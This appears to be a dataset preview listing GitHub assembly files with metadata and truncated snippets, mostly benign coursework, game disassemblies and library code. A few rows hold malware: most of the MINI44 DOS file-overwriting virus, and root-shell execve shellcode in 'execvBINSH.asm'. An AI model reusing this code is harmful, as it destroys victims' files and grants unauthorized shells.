max_stars_repo_path
stringlengths
3
255
max_stars_repo_name
stringlengths
5
116
max_stars_count
int64
0
107k
id
stringlengths
1
7
content
stringlengths
63
1.05M
project 08/FunctionCalls/SimpleFunction/SimpleFunction.asm
jack-zheng/nand2tetris
0
120738
// function SimpleFunction.test (SimpleFunction.test)// push local 0 @0 D=A @LCL A=D+M D=M @SP A=M M=D @SP M=M+1 // push local 0 @0 D=A @LCL A=D+M D=M @SP A=M M=D @SP M=M+1 // push local 0 @0 D=A @LCL A=D+M D=M @SP A=M M=D @SP M=M+1 // push local 1 @1 D=A @LCL A=D+M D=M @SP A=M M=D @SP M=M+1 // add @SP AM=M-1 D=M A=A-1...
expression1.asm
shashankdasverma/MPlab
0
120739
.model small .data a dw 1220 b dw 2345 c db 50 d dw 100 e dw? .code mov ax,@data mov ds,ax mov ax,a add ax,b mov cl,c mov dx,d add cx,dx sub ax,cx mov e,ax mov ah,4ch int 21h end
P6/data_P6_2/cal_R_test54.asm
alxzzhou/BUAA_CO_2020
1
120740
lui $1,33359 ori $1,$1,38672 lui $2,38831 ori $2,$2,63235 lui $3,6877 ori $3,$3,38883 lui $4,49882 ori $4,$4,12210 lui $5,39964 ori $5,$5,64134 lui $6,40750 ori $6,$6,8953 mthi $1 mtlo $2 sec0: nop nop nop xor $4,$6,$2 sec1: nop nop sltu $6,$3,$5 xor $4,$6,$2 sec2: nop nop andi $6,$1,60752 xor $1,$6,$2 sec3...
engine/phone/scripts/reminders.asm
Dev727/ancientplatinum
28
120741
<filename>engine/phone/scripts/reminders.asm JackWantsBattleScript: farwritetext UnknownText_0x174638 end HueyWantsBattleScript: farwritetext UnknownText_0x1749c7 end UnknownScript_0xa0a37: farwritetext UnknownText_0x174c49 end BethBattleReminderScript: farwritetext BethForgetDealText end UnknownScript_0xa0...
lib/tgbl_main.asm
trexxet/tgbl
14
120742
<reponame>trexxet/tgbl<filename>lib/tgbl_main.asm<gh_stars>10-100 ; TGBL main file ; Include it at the beginning of your program ; Fill the rest space of sectors with zeroes ; Args: number of sectors, beginning of sectors to be filled %macro tgblm_endSector 2 times 512 * %1 - ($ - %2) db 0 %endmacro ; Include module...
ioq3/build/release-js-js/baseq3/ui/ui_teamorders.asm
RawTechnique/quake-port
1
120743
data align 4 LABELV ctfOrders address $69 address $70 address $71 address $72 address $73 address $74 address $75 byte 4 0 align 4 LABELV ctfMessages address $76 address $77 address $78 address $79 address $80 address $81 address $82 byte 4 0 align 4 LABELV teamOrders address $69 address $71 address $83 address $73 add...
ls.asm
vishal-pathare/xv6-public
0
120744
<gh_stars>0 _ls: file format elf32-i386 Disassembly of section .text: 00000000 <main>: close(fd); } int main(int argc, char *argv[]) { 0: 8d 4c 24 04 lea 0x4(%esp),%ecx 4: 83 e4 f0 and $0xfffffff0,%esp 7: ff 71 fc pushl -0x4(%ecx) a: 55 ...
assembler/tests/t_s12z/t_s12z.asm
paulscottrobson/RCA-Cosmac-VIP-III
0
120745
<filename>assembler/tests/t_s12z/t_s12z.asm<gh_stars>0 cpu s912zvh128f2clq page 0 padding off bstruct struct dots value ds.b 1 bflg defbit value,5 bfld defbitfield value,3:1 ends org $123 myb bstruct wstruct struct dots value ds.w 1 wflg defbit value,12 wfld defbitfield value,5:7 ends org $240 myw wstruct lst...
MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm
fengjixuchui/Family
3
120746
;---------------------------------------------------------------------------- ; TPE-GEN - This program generates 50 TPE encrypted test files ; ; This source can be compiled with MASM 5.0 or TASM 2.01 ; (and perhaps others too, but this is not tested.) ;--------------------------------------------------------...
bresenham_demo.asm
t33bu/retro-assembly
1
120748
; ************************************************************** ; BRESENHAM'S ALGORITHM FOR COMMODORE PLUS/4 ASSEMBLY ; ; <NAME> (<EMAIL>), 29TH DEC 2019 ; ; https://en.wikipedia.org/wiki/Bresenham%27s_line_algorithm#All_cases ; ************************************************************** ; 10 SYS (5120) ;*=$1001 ;...
ffight/lcs/enemy/34.asm
zengfr/arcade_game_romhacking_sourcecode_top_secret_data
6
120750
copyright zengfr site:http://github.com/zengfr/romhack 003A02 movem.l D0-D3, -(A6) 003A06 movem.l D0-D3, -(A6) 009ACA dbra D5, $9ac8 021CF4 move.l #$d23b4, ($32,A6) [enemy+ E, enemy+10] 021CFC moveq #$0, D0 [enemy+32, enemy+34] 028112 move.l #$d23b4, ($32,A6) [enemy+ E, enemy+10] 02811A moveq #$0, D0...
src/isa/avx/masm/vrs4_cosf.asm
jepler/aocl-libm-ose
66
120752
; ; Copyright (C) 2008-2020 Advanced Micro Devices, Inc. All rights reserved. ; ; Redistribution and use in source and binary forms, with or without modification, ; are permitted provided that the following conditions are met: ; 1. Redistributions of source code must retain the above copyright notice, ; this list...
programs/oeis/045/A045747.asm
neoneye/loda
22
120753
<reponame>neoneye/loda ; A045747: Number of prime factors of n!!!! (A007662), with multiplicity. ; 0,1,1,2,1,3,2,5,3,5,3,8,4,7,5,12,5,10,6,15,7,12,7,19,9,14,10,22,10,17,11,27,12,19,13,31,13,21,15,35,14,24,16,38,17,26,17,43,19,29,19,46,20,33,21,50,22,35,22,54,23,37,25,60,25,40,26,63,27,43,27,68,28,45,30,71 lpb $0 mov...
cbm8bit/src/rds64.asm
smay4finger/Zimodem
0
120754
<reponame>smay4finger/Zimodem * = 49152 ; remote desktop server ; v1.0 07/07/2017 03:23p ; for c64net/zimodem v2.7+ ; ;.o ;.d rds64.bin jmp init;+0 jmp resmio;+3 jmp resmio;+6 jmp resmio;+9 jmp resmio;+12 ; ; ; ; ; public regs ; ; ; ; ; ; stat1s byte 0;+15...
oeis/088/A088128.asm
neoneye/loda-programs
11
120755
; A088128: Expansion of e.g.f.: cosh(x)/(1-x)^2. ; Submitted by <NAME> ; 1,2,7,30,157,970,6931,56294,512569,5173074,57330271,692227822,9045871957,127205130650,1915394962027,30748771424310,524265894691441,9461374592096674,180184121539899319,3611206508019111614 add $0,1 lpb $0 mul $1,$2 cmp $3,0 mul $3,$0 sub $0...
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_1523_984.asm
ljhsiun2/medusa
9
120756
.global s_prepare_buffers s_prepare_buffers: push %r12 push %r13 push %r8 push %r9 push %rbp push %rcx push %rdi push %rsi lea addresses_WC_ht+0x13251, %rdi nop nop nop add %r13, %r13 vmovups (%rdi), %ymm3 vextracti128 $1, %ymm3, %xmm3 vpextrq $1, %xmm3, %r9 nop nop nop nop nop and %rcx, %rcx lea addresses_UC_ht+0x6f51...
P6/P6Judger - 100 testpoints/testpoint/testpoint93.asm
flyinglandlord/BUAA-CO-2021
5
120757
<filename>P6/P6Judger - 100 testpoints/testpoint/testpoint93.asm ori $1, $0, 8 ori $2, $0, 0 ori $3, $0, 10 ori $4, $0, 7 sw $4, 0($0) sw $1, 4($0) sw $4, 8($0) sw $2, 12($0) sw $1, 16($0) sw $3, 20($0) sw $3, 24($0) sw $1, 28($0) sw $3, 32($0) sw $2, 36($0) sw $4, 40($0) sw $2, 44($0) sw $4, 48($0) sw $4, 52($0) sw $1...
oeis/034/A034178.asm
neoneye/loda-programs
11
120758
<filename>oeis/034/A034178.asm<gh_stars>10-100 ; A034178: Number of solutions to n = a^2 - b^2, a > b >= 0. ; Submitted by <NAME> ; 1,0,1,1,1,0,1,1,2,0,1,1,1,0,2,2,1,0,1,1,2,0,1,2,2,0,2,1,1,0,1,2,2,0,2,2,1,0,2,2,1,0,1,1,3,0,1,3,2,0,2,1,1,0,2,2,2,0,1,2,1,0,3,3,2,0,1,1,2,0,1,3,1,0,3,1,2,0,1,3,3,0,1,2,2,0,2,2,1,0,2,1,2,0,...
kernel/src/arch/riscv32/boot/trap.asm
chenqiuhao1997/RustOS
0
120760
.macro SAVE_ALL # If coming from userspace, preserve the user stack pointer and load # the kernel stack pointer. If we came from the kernel, sscratch # will contain 0, and we should continue on the current stack. csrrw sp, 0x140, sp # sscratch bnez sp, _save_context _restore_kernel_sp: csrr ...
cs61/lab9/lab09_ex3.asm
bmoya217/ucr
0
120761
;=============================================================================== ; Name: <NAME> ; Username: <EMAIL> ; ; Lab: lab 9.2 ; Lab section: 021 ; TA: <NAME> ; ;=============================================================================== .ORIG x3000 ;Instructions LD R1, POINTER ;STACK ADDRESS LD R2, P...
libsrc/_DEVELOPMENT/l/sdcc/____sdcc_ll_add_deix_bc_hl.asm
jpoikela/z88dk
640
120763
SECTION code_clib SECTION code_l_sdcc PUBLIC ____sdcc_ll_add_deix_bc_hl EXTERN ____sdcc_ll_add_de_bc_hl ____sdcc_ll_add_deix_bc_hl: push hl IFDEF __SDCC_IX push ix pop hl ELSE push iy pop hl ENDIF add hl,de ex de,hl pop hl jp ____sdcc_ll_add_de_bc_hl
Assembly/Project/Interpret_Indirect.asm
Myself086/Project-Nested
338
120764
<filename>Assembly/Project/Interpret_Indirect.asm .vstack _VSTACK_START // This code must be placed in a LoROM bank, non-zero bank and non-zero page // --------------------------------------------------------------------------- .macro Interpret_Indirect_Switch OpcodeName, IsLda .align 0x100 Interpret__{0}In...
bin/JWASM/Samples/Win64_9d.asm
Abd-Beltaji/ASMEMU
3
120765
<reponame>Abd-Beltaji/ASMEMU<filename>bin/JWASM/Samples/Win64_9d.asm<gh_stars>1-10 ;--- Win64 Dll sample. ;--- ;--- Assemble with JWasm: ;--- JWasm -win64 Win64_9d.asm ;--- ;--- 1. link with MS link: ;--- Link /DLL Win64_9d.OBJ ;--- 2. link with JWlink: ;--- JWlink format win pe dll file Win64_9d.OBJ op implib ;...
libsrc/_DEVELOPMENT/temp/sp1/zx/c/sccz80/sp1_RestoreUpdateStruct.asm
jpoikela/z88dk
640
120767
; sp1_RestoreUpdateStruct ; 04.2006 aralbrec, Sprite Pack v3.0 ; sinclair zx version SECTION code_clib SECTION code_temp_sp1 PUBLIC sp1_RestoreUpdateStruct EXTERN asm_sp1_RestoreUpdateStruct defc sp1_RestoreUpdateStruct = asm_sp1_RestoreUpdateStruct
_anim/FZ Eggman in Ship.asm
kodishmediacenter/msu-md-sonic
9
120768
<gh_stars>1-10 ; --------------------------------------------------------------------------- ; Animation script - Eggman (FZ) ; --------------------------------------------------------------------------- Ani_FZEgg: dc.w byte_1A3D6-Ani_FZEgg byte_1A3D6: dc.b 3, 0, 1, afEnd even
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0xca.log_21829_119.asm
ljhsiun2/medusa
9
120769
.global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r14 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_UC_ht+0x1bba8, %rsi lea addresses_D_ht+0x15ab0, %rdi nop nop and $65208, %rax mov $86, %rcx rep movsl nop nop cmp $21844, %rbp lea addresses_normal_ht+0x51a4, %rsi lea addresses_WC_...
x86/CheckTime.asm
lucabrivio/asmFish-fasmg
1
120770
<reponame>lucabrivio/asmFish-fasmg calign 16 CheckTime: ; we must: ; set signals stop if the search is to be aborted (soon) ; and determine a good resetCnt to send to all threads ; lower values of resetCnt lead to to better resolution but increased polling ; conversely for hig...
Transynther/x86/_processed/NONE/_st_/i7-7700_9_0xca_notsx.log_21829_1741.asm
ljhsiun2/medusa
9
120771
<filename>Transynther/x86/_processed/NONE/_st_/i7-7700_9_0xca_notsx.log_21829_1741.asm .global s_prepare_buffers s_prepare_buffers: push %r13 push %r14 push %r15 push %r9 push %rbp push %rcx push %rdi push %rsi lea addresses_UC_ht+0x595e, %rsi lea addresses_A_ht+0x1367b, %rdi nop nop and $62425, %r13 mov $79, %rcx rep ...
Transynther/x86/_processed/US/_zr_/i9-9900K_12_0xca.log_21829_790.asm
ljhsiun2/medusa
9
120772
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r14 push %r15 push %rcx push %rdi push %rdx push %rsi lea addresses_A_ht+0x3d7d, %rsi lea addresses_A_ht+0xec2d, %rdi nop nop sub %r10, %r10 mov $52, %rcx rep movsb xor $13414, %r12 lea addresses_normal_ht+0x1ef72, %r14 clflush (%r14) nop nop nop cm...
Palmtree.Math.Core.Implements/vs_build/x86_Debug/cpp_standard_headers_indexer.asm
rougemeilland/Palmtree.Math.Core.Implements
0
120773
; Listing generated by Microsoft (R) Optimizing Compiler Version 19.16.27026.1 TITLE Z:\Sources\Lunor\Repos\rougemeilland\Palmtree.Math.Core.Implements\Palmtree.Math.Core.Implements\nbproject\private\cpp_standard_headers_indexer.cpp .686P .XMM include listing.inc .model flat INCLUDELIB MSVCRTD INCLUDELIB OLDNAM...
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_2368.asm
ljhsiun2/medusa
9
120774
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r14 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_WC_ht+0x1eae7, %rbp nop nop dec %r14 movb (%rbp), %al nop nop sub %r11, %r11 lea addresses_WT_ht+0x5765, %rsi lea addresses_D_ht+0x692f, %rdi nop nop nop xor $62458, %rax mov $115, ...
Scrollable HDMA Gradients/examples/Day.asm
MarioFanGamer/HDMA-Libraries
0
120775
<reponame>MarioFanGamer/HDMA-Libraries !ScrollLayer = 1 ; The layer in which the HDMA is rooted. !ScrollOffset = $0000 ; How much is the table shifted !ScrollFactor = 0 ; The division is exponential, using 2 as its base. init: %ScrollHdmaInit(Gradient) main: %ScrollHdmaMain(!ScrollLayer, !ScrollOffset, !ScrollFac...
kernel/lock.asm
iocoder/upcr
0
120776
;############################################################################### ;# File name: KERNEL/LOCK.ASM ;# DESCRIPTION: KERNEL SEMAPHORE TO PROTECT KERNEL CODE ACCESS ;# AUTHOR: <NAME>. ;############################################################################### ;# ;# UPCR OPERATING SYSTEM FOR X86_...
Driver/Printer/DotMatrix/Escp2/escp2generInfo.asm
steakknife/pcgeos
504
120777
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) Berkeley Softworks 1990 -- All Rights Reserved PROJECT: PC GEOS MODULE: Epson Escape P2 24-pin driver FILE: escp2generInfo.asm AUTHOR: <NAME>, 27 Mar 1990 REVISION HISTORY: Name Date Description ---- --...
samples/execvBINSH.asm
0x00-0x00/shellcoding
0
120779
[SECTION .text] global _start _start: xor eax, eax mov al, 70 xor ebx, ebx xor ecx, ecx int 0x80 jmp short ender ;pula pra funcao ender starter: pop ebx ; pega o endereco da string e joga no ebx xor eax, eax ;zera eax mov [ebx+7 ], al ;coloca o 0 do eax no N da string mov [ebx+8 ], ebx ; coloca o enderec...
45/beef/cw/kernel/lddebug.asm
minblock/msdos
0
120780
<reponame>minblock/msdos<filename>45/beef/cw/kernel/lddebug.asm ;* ;* COW : Character Oriented Windows ;* ;* lddebug.asm : debugger support TITLE LDDEBUG - Debugger interface procedures .xlist ?LDDEBUG = 1 include kernel.inc include handle.inc .list ;* ENTIRE FILE IS DEBUG SUPPORT ! ;* ;* It comes in two p...
libsrc/math/mbf32/c/sccz80/fp_return.asm
ahjelm/z88dk
640
120781
SECTION code_fp_mbf32 PUBLIC ___mbf32_return EXTERN ___mbf32_FPREG ; Return the value that's in the DAC ___mbf32_return: IF __CPU_GBZ80__ ld hl,___mbf32_FPREG+3 ld d,(hl) dec hl ld e,(hl) dec hl ld a,(hl-) ld l,(hl) ld h,a ...
programs/oeis/255/A255178.asm
jmorken/loda
1
120782
<reponame>jmorken/loda ; A255178: Second differences of eighth powers (A001016). ; 1,254,6050,52670,266114,963902,2796194,6927230,15257090,30683774,57405602,101263934,170126210,274309310,427043234,644975102,948713474,1363412990,1919399330,2652834494,3606422402,4830154814,6382097570,8329217150,10748247554,13726597502,17...
programs/oeis/246/A246552.asm
neoneye/loda
22
120783
<reponame>neoneye/loda<filename>programs/oeis/246/A246552.asm ; A246552: 2-adic valuation of the number of involutions of n (A000085). ; 0,0,1,2,1,1,2,3,2,2,3,4,3,3,4,5,4,4,5,6,5,5,6,7,6,6,7,8,7,7,8,9,8,8,9,10,9,9,10,11,10,10,11,12,11,11,12,13,12,12,13,14,13,13,14,15,14,14,15,16,15,15,16,17,16,16,17,18,17,17,18,19,18,1...
Source Codes Testing/add initilised.asm
aravindvnair99/emu8086
11
120784
<reponame>aravindvnair99/emu8086 .MODEL small .STACK .DATA num1 db 01h num2 db 02h .CODE .STARTUP mov bh, num1 add bh,num2 .EXIT end
oeis/192/A192217.asm
neoneye/loda-programs
11
120785
<gh_stars>10-100 ; A192217: a(1)=1; a(n) = n*lcm(n, a(n-1)) for n > 1. ; Submitted by <NAME>(l1) ; 1,4,36,144,3600,21600,1058400,8467200,76204800,762048000,92207808000,1106493696000,186997434624000,2617964084736000,39269461271040000,628311380336640000,181581988917288960000,3268475800511201280000,11799197639845436620800...
examples/stdout.asm
KCreate/stackvm
45
120786
.org 0x00 .label entry_addr .label main push t_address, myconst push t_size, 12 push t_syscall, sys_write syscall push float, 0.1 push t_syscall, sys_sleep syscall jmp main .db myconst 12 "hello world\n"
Benchmark/nestings.asm
DW0RKiN/M4_FORTH
2
120787
<filename>Benchmark/nestings.asm ORG 0x8000 ; === b e g i n === ld (Stop+1), SP ; 4:20 not need ld L, 0x1A ; 2:7 Upper screen call 0x1605 ; 3:17 Open channel ld HL, 60000 ; 3:10 Init Return address stack exx ; 1:4 push DE ...
oeis/046/A046666.asm
neoneye/loda-programs
11
120789
; A046666: a(n) = n - (smallest prime dividing n). ; Submitted by <NAME> ; 0,0,2,0,4,0,6,6,8,0,10,0,12,12,14,0,16,0,18,18,20,0,22,20,24,24,26,0,28,0,30,30,32,30,34,0,36,36,38,0,40,0,42,42,44,0,46,42,48,48,50,0,52,50,54,54,56,0,58,0,60,60,62,60,64,0,66,66,68,0,70,0,72,72,74,70,76,0,78,78,80,0,82,80,84,84,86,0,88,84,90,9...
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_1403.asm
ljhsiun2/medusa
9
120791
<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r11 push %rdi push %rdx push %rsi lea addresses_UC_ht+0x77cd, %rsi nop nop sub $56671, %r11 mov (%rsi), %edx nop nop and $21362, %rdi pop %rsi pop %rdx pop %rdi pop %r11 ret .global s_faulty_load s_faulty_load: push %r11 push %r13 push %r15 push %r8...
programs/oeis/273/A273372.asm
karttu/loda
1
120792
<gh_stars>1-10 ; A273372: Squares ending in digit 1. ; 1,81,121,361,441,841,961,1521,1681,2401,2601,3481,3721,4761,5041,6241,6561,7921,8281,9801,10201,11881,12321,14161,14641,16641,17161,19321,19881,22201,22801,25281,25921,28561,29241,32041,32761,35721,36481,39601,40401,43681,44521,47961,48841,52441,53361,57121,58081,6...
src/MFORTH/answords/search.asm
malyn/MFORTH
10
120793
; Copyright (c) 2011, <NAME> <<EMAIL>>. ; All rights reserved. ; ; Redistribution and use in source and binary forms, with or without ; modification, are permitted provided that the following conditions are met: ; ; 1. Redistributions of source code must retain the above copyright notice ; unmodified, this list of c...
tools/DOSBox-0.74Win/FSysFAT/avt/p2/mini44.asm
cyberitsec/antivirus
1
120794
.model small .code ORG 100h FNAME EQU 9Eh MINI44: mov AH, 4Eh ; SEARCH FIRST mov DX, offset COMP_FILE int 21h SEARCH_LP: jc DONE mov AX, 3D01h ; OPEN mov DX, FNAME int 21h xchg AX, BX mov AH, 40h ; WRITE myself as virus mov CL, 44 mov DX, 100h int 21h mov AH, 3Eh ; CLOSE int ...
src/arch/x86_64/apic_longmode.asm
dendisuhubdy/IncludeOS
3,673
120795
global __apic_trampoline:function extern __gdt64_base_pointer extern revenant_main ;; we will be calling these from AP initialization extern x86_enable_sse extern x86_enable_fpu_native extern x86_enable_xsave extern x86_enable_avx %define P4_TAB 0x1000 ;; Extended Feature Enable Register (MSR) %define IA32_EFER_MS...
Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_1131.asm
ljhsiun2/medusa
9
120796
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r15 push %r8 push %r9 push %rcx push %rdi push %rsi lea addresses_WT_ht+0x171fb, %rsi nop nop nop nop xor $11545, %r8 movw $0x6162, (%rsi) nop and $35208, %rdi lea addresses_UC_ht+0x177fb, %r15 nop nop nop inc %rdi movl $0x61626364, (%r15) nop nop n...
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca.log_21829_44.asm
ljhsiun2/medusa
9
120797
<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r10 push %r14 push %r15 push %r8 push %rcx push %rdi push %rdx push %rsi lea addresses_WT_ht+0x181d6, %r8 clflush (%r8) and $15879, %rcx movl $0x61626364, (%r8) nop nop nop nop cmp %rdx, %rdx lea addresses_WC_ht+0x1a536, %rdi xor $35543, %r10 ...
linux/incr.asm
zhyhang/asm-misc
0
120798
<reponame>zhyhang/asm-misc<filename>linux/incr.asm ;Compile >> nams -gdwarf -f elf64 this.asm ;GDB can step into this file from caller in term of -gdwarf global increase_one section .data align=32 section .text align 8 increase_one: inc rdi mov rax,rdi ret
Appl/Art/Decks/GeoDeck/LMHeart6.asm
steakknife/pcgeos
504
120799
<reponame>steakknife/pcgeos LMHeart6 label byte word C_BLACK Bitmap <71,100,BMC_PACKBITS,BMF_MONO> db 0xf8, 0x00 db 0xf8, 0x00 db 0xf8, 0x00 db 0xf8, 0x00 db 0x01, 0x03, 0xe0, 0xfc, 0x00, 0x01, 0x1d, 0xc0 db 0x01, 0x07, 0xf0, 0xfc, 0x00, 0x01, 0x37, 0x60 db 0x01, 0x0e, 0x38, 0xfc, 0x00, 0x01, 0x2a, 0x...
oeis/284/A284985.asm
neoneye/loda-programs
11
120800
<reponame>neoneye/loda-programs ; A284985: a(0)=0, a(1)=24; for n>=2, a(n)=576*a(n-1)-a(n-2). ; Submitted by <NAME> ; 0,24,13824,7962600,4586443776,2641783652376,1521662797324800,876475129475432424,504848152915051751424,290791659603940333387800,167495491083716716979621376,96477112072561225039928524776,55570649058304181...
audit/softswitch.asm
zellyn/a2audit
22
120801
<reponame>zellyn/a2audit<filename>audit/softswitch.asm ;;; Apple IIe softswitch-reading tests ;;; Copyright © 2017 <NAME> <<EMAIL>> !zone softswitch { .resetloc = tmp1 .setloc = tmp3 .readloc = tmp5 .loopcount = tmp0 .switch = SRC .testtimes = 8 SOFTSWITCHTESTS lda #1 sta SOFTSWITCHRESULT lda MACHINE cmp...
oeis/202/A202129.asm
neoneye/loda-programs
11
120802
<reponame>neoneye/loda-programs<filename>oeis/202/A202129.asm ; A202129: Numbers n such that 90n + 71 is prime. ; Submitted by <NAME> ; 0,2,4,5,7,9,10,11,12,16,17,20,23,26,28,31,33,35,38,39,40,41,42,46,48,49,52,54,55,59,60,62,63,66,67,72,76,77,82,83,87,89,90,101,103,104,105,108,111,112,114,117,118,119,125,126,129,133,1...
linux64/lesson21.asm
mashingan/notes-asmtutor
1
120803
format ELF64 executable 3 entry start include 'procs.inc' segment readable msg db 'Seconds since 1 January 1970: ', 0h segment readable executable start: mov rax, msg call sprint mov rdi, 0 mov rax, 201 ; SYS_TIME (kernel opcode 201) syscall call iprintLF call quit...
ProgramExamples/MIPSOut/IfTest.asm
Abductcows/GlorifiedCalculatorCompiler
0
120805
<gh_stars>0 .data _newLine: .asciiz "\n" _divByZeroMessage: .asciiz "\nException: division by zero\nProgram will be terminated\n" _floatOverflowMessage: .asciiz "\nException: floating point operation result too great to fit in floating point word\nProgram will be terminated\n" _floatUnderflowMessage: .asciiz "\nExcepti...
examples/hello.mips.asm
dyhla/atom-script
55
120806
<filename>examples/hello.mips.asm<gh_stars>10-100 .data hello: .asciiz "Hello world!" .text main: li $v0, 4 # system call code for printing string = 4 la $a0, hello # load address of string to be printed into $a0 syscall end: li $v0, 10 # terminate program syscall
source/actions/if.asm
paulscottrobson/lean
2
120807
; ****************************************************************************** ; ****************************************************************************** ; ; Name : if.asm ; Purpose : If/Else/Endif ; Author : <NAME> (<EMAIL>) ; Created : 27th October 2019 ; ; *******************************************...
oeis/312/A312556.asm
neoneye/loda-programs
11
120808
<reponame>neoneye/loda-programs<gh_stars>10-100 ; A312556: Coordination sequence Gal.6.246.1 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. ; Submitted by <NAME> ; 1,4,8,14,18,24,28,34,38,44,48,52,56,60,66,70,76,80,86,90,96,100,104,10...
programs/oeis/067/A067725.asm
neoneye/loda
22
120809
<reponame>neoneye/loda ; A067725: a(n) = 3*n^2 + 6*n. ; 0,9,24,45,72,105,144,189,240,297,360,429,504,585,672,765,864,969,1080,1197,1320,1449,1584,1725,1872,2025,2184,2349,2520,2697,2880,3069,3264,3465,3672,3885,4104,4329,4560,4797,5040,5289,5544,5805,6072,6345,6624,6909,7200,7497,7800,8109,8424,8745,9072,9405,9744,1008...
oeis/276/A276153.asm
neoneye/loda-programs
11
120810
; A276153: The most significant digit when n is written in primorial base (A049345). ; 0,1,1,1,2,2,1,1,1,1,1,1,2,2,2,2,2,2,3,3,3,3,3,3,4,4,4,4,4,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3 lpb $0,$0 dif $2,2 add $2,2 ...
oeis/252/A252736.asm
neoneye/loda-programs
11
120812
<reponame>neoneye/loda-programs<filename>oeis/252/A252736.asm ; A252736: a(1) = a(2) = 0; for n > 2: a(2n) = 1 + a(n), a(2n+1) = a(A064989(2n+1)). ; Submitted by <NAME> ; 0,0,0,1,0,1,0,2,1,1,0,2,0,1,1,3,0,2,0,2,1,1,0,3,1,1,2,2,0,2,0,4,1,1,1,3,0,1,1,3,0,2,0,2,2,1,0,4,1,2,1,2,0,3,1,3,1,1,0,3,0,1,2,5,1,2,0,2,1,2,0,4,0,1,2...
programs/oeis/074/A074613.asm
karttu/loda
1
120813
; A074613: a(n) = 4^n + 7^n. ; 2,11,65,407,2657,17831,121745,839927,5830337,40615751,283523825,1981521047,13858064417,96956119271,678491508305,4748635251767,33237225536897,232647693856391,1628482317387185,11399170063280087 mov $1,7 pow $1,$0 mov $2,4 pow $2,$0 add $1,$2 div $1,9 mul $1,9 add $1,2
oeis/051/A051462.asm
neoneye/loda-programs
11
120814
; A051462: Molien series for group G_{1,2}^{8} of order 1536. ; Submitted by <NAME>(s2) ; 1,4,11,25,48,83,133,200,287,397,532,695,889,1116,1379,1681,2024,2411,2845,3328,3863,4453,5100,5807,6577,7412,8315,9289,10336,11459,12661,13944,15311,16765,18308,19943,21673,23500,25427,27457,29592,31835,34189,36656,39239,41941,447...
s2/music-original/8A - DEZ.asm
Cancer52/flamedriver
9
120815
<gh_stars>1-10 DEZ_Header: smpsHeaderStartSong 2 smpsHeaderVoice DEZ_Voices smpsHeaderChan $06, $03 smpsHeaderTempo $01, $60 smpsHeaderDAC DEZ_DAC smpsHeaderFM DEZ_FM1, $00, $16 smpsHeaderFM DEZ_FM2, $00, $08 smpsHeaderFM DEZ_FM3, $00, $10 smpsHeaderFM DEZ_FM4, $...
oeis/108/A108679.asm
neoneye/loda-programs
11
120816
<filename>oeis/108/A108679.asm ; A108679: a(n) = (n+1)*(n+2)^2*(n+3)^2*(n+4)^2*(n+5)^2*(n+6)/86400. ; 1,21,196,1176,5292,19404,60984,169884,429429,1002001,2186184,4504864,8836464,16604784,30046752,52581816,89311761,147685461,238369516,376372920,582481900,885069900,1322357400,1945206900,2820550005,4035556161,5702666256,...
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca_notsx.log_21829_161.asm
ljhsiun2/medusa
9
120817
<reponame>ljhsiun2/medusa<filename>Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca_notsx.log_21829_161.asm .global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r14 push %r9 push %rbp push %rdi lea addresses_normal_ht+0x6ccd, %r14 nop cmp $57234, %r11 mov $0x6162636465666768, %rbp movq %rbp, %xmm...
programs/oeis/141/A141022.asm
jmorken/loda
1
120818
; A141022: a(n) = n mod ((sum of digits of n)+1). ; 0,1,2,3,4,5,6,7,8,9,0,2,0,3,2,1,0,8,8,8,2,1,2,5,3,1,8,7,6,5,2,1,2,5,2,8,6,4,2,0,0,5,0,3,8,5,2,11,9,7,2,2,4,8,4,0,8,5,2,14,4,5,8,3,9,5,1,11,8,5,6,8,2,7,2,10,6,2,14,11,8,1,5,11,6,1,11,7,3,17,0,3,8,2,10,5,0,12,8,4,0,2,2,3,2,0,2,8,8,10,2,3,2,5,2,3,8,7,8,11,0,1,2,4,4,8,6,6...
timers/sys_clocks_init_dmg_mode/main.asm
AntonioND/gbc-hw-tests
6
120819
<reponame>AntonioND/gbc-hw-tests<gh_stars>1-10 INCLUDE "hardware.inc" INCLUDE "header.inc" SECTION "Main",HOME ;-------------------------------------------------------------------------- ;- Main() - ;--------------------------------------------------...
data/mapObjects/PokemonTower3F.asm
AmateurPanda92/pokemon-rby-dx
9
120820
PokemonTower3F_Object: db $1 ; border block db 2 ; warps warp 3, 9, 0, POKEMON_TOWER_2F warp 18, 9, 1, POKEMON_TOWER_4F db 0 ; signs db 4 ; objects object SPRITE_MEDIUM, 12, 3, STAY, LEFT, 1, OPP_CHANNELER, 5 object SPRITE_MEDIUM, 9, 8, STAY, DOWN, 2, OPP_CHANNELER, 6 object SPRITE_MEDIUM, 10, 13, STAY, DOW...
Palmtree.Math.Core.Implements/vs_build/x64_Debug/pmc_divrem.asm
rougemeilland/Palmtree.Math.Core.Implements
0
120821
